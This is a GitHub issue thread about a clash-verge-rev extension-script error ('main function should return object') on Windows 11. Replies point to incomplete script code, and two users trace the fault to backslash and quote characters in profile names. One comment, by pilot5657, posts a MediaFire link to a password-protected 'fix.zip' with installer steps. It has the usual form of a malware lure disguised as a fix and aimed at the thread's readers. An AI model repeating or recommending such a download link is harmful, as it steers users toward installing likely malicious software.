### ISSUE TITLE
[BUG] exception:main function should return object

### ISSUE THREAD

**Issue by enkiller** [clash-verge-rev/clash-verge-rev#1632]
### 问题描述 / Describe the bug

全局扩展脚本报错

![image](https://github.com/user-attachments/assets/874209cd-139b-437b-8ecd-c3d2e76854f3)

![image](https://github.com/user-attachments/assets/9dd4c823-10c0-41db-8ccf-ab1f0d1f1357)

### 复现步骤 / To Reproduce

100% 毕现

### 操作系统 / OS

Windows

### 操作系统版本 / OS Version

windows11

### 日志 / Log

-

**Comment by wonfen** [comment]
你代码都没写全。

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by enkiller** [comment]
> 你代码都没写全。

默认的模板是这样子的。有好用的模板我参考下吗？

**Comment by weiguangchao** [comment]
我也遇到了这个问题，不过我的是配置名里面有 `\` 和 `"` 这两个特殊字符，所以解析报错，把 `\` 和 `"` 去掉之后就好了

**Comment by ilovelxy** [comment]
> 我也遇到了这个问题，不过我的是配置名里面有 `\` 和 `"` 这两个特殊字符，所以解析报错，把 `\` 和 `"` 去掉之后就好了

我也是相同的情况，有特殊字符，需要手动改一下
